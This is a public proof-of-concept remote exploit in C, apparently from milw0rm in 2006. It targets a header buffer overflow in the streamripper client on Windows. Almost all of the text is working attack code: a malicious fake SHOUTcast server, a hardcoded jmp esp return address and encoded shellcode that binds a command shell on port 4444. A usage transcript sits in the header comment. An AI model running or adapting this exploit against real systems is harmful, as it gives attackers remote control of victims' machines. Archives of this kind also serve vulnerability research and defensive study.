/*
* name: streamripper <= 1.61.25 win32 remote exploit
*
* bug by: Ulf Harnhammar
* status: public
* exploit: psylocn
* payload: portbind 4444
* **********************************************************
* K:\>exploit.exe 80 0
* [ public-release ]
* streamripper <= 1.61.25 remote exploit
* exploit by psylocn 2006
* bug by Ulf Harnhammar
*
* [+] server started!
* [+] server waits
*
*
* go to next shell
* K:\>streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
/* portbind shellcode port 4444*/
unsigned char portbindsc[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";
char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
"icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7<BR>\r\n"
"icy-name:Radioseven - www.radio.de\r\n"
"icy-genre:Dance Trance House\r\n"
"icy-url:http://www.radio.de\r\n"
"content-type:"; //buffer to exploit
char part2[] = "\r\n"
"icy-pub:1\r\n"
"icy-metaint:8192\r\n"
"icy-br:CCCCCCC\r\n\r\n";
char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp
struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp
{ 1, "debug [testing] ", 0x41414141 },
};
void Usage(){
int i;
printf("Usage: exploit.exe port target\n\n"
"Targets:\n\n");
for (i = 0; i < 2; i++)
{
if(target[i].name != 0)
fprintf(stderr," [%u] %s\n",i,target[i].name);
else
break;
}
exit(1);
}
int main (int argc, char **argv) {
char *host;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
int sockfd,port,new_sock,sin_size=sizeof (their_addr);
char buffer[3565];
#ifdef _WIN32
WSADATA wsa;
#endif
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("[ public-release ]\n");
printf("\tstreamripper <= 1.61.25 remote exploit \n");
printf("\texploit by psylocn 2006\n");
printf("\tbug by Ulf Harnhammar\n\n");
unsigned long ntarget = 0;
if (argc < 3) Usage();
if ((ntarget = atoi(argv[2])) > 1) Usage();
port = (unsigned short)atoi(argv[1]);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket error\n");
return 0;
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(port);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {
printf("\n[-] bind error\n");
return 0;
}
else printf ("[+] server started!\n");
if (listen (sockfd, 3) == SOCKET_ERROR) {
printf("\n[-] listen error\n");
return 0;
}
printf ("[+] server waits\n");
if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {
printf("\n[-] accept error\n");
return 0;
}
else
printf ("[+] client conneted!\n");
memset ( buffer, 0x90, sizeof(buffer) - 1 );
memcpy ( buffer, part1, strlen(part1) );
memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
memcpy ( buffer+3150, fixstack,strlen(fixstack) );
memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
memcpy ( buffer+3515, part2, sizeof(part2) );
if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {
printf("[-] send error\n");
return 0;
}
sleep(2000);
printf("[+] exploit send check shell on port 4444\n");
closesocket(sockfd);
#ifdef _WIN32
WSACleanup ();
#endif
return 0;
}
// milw0rm.com [2006-08-29]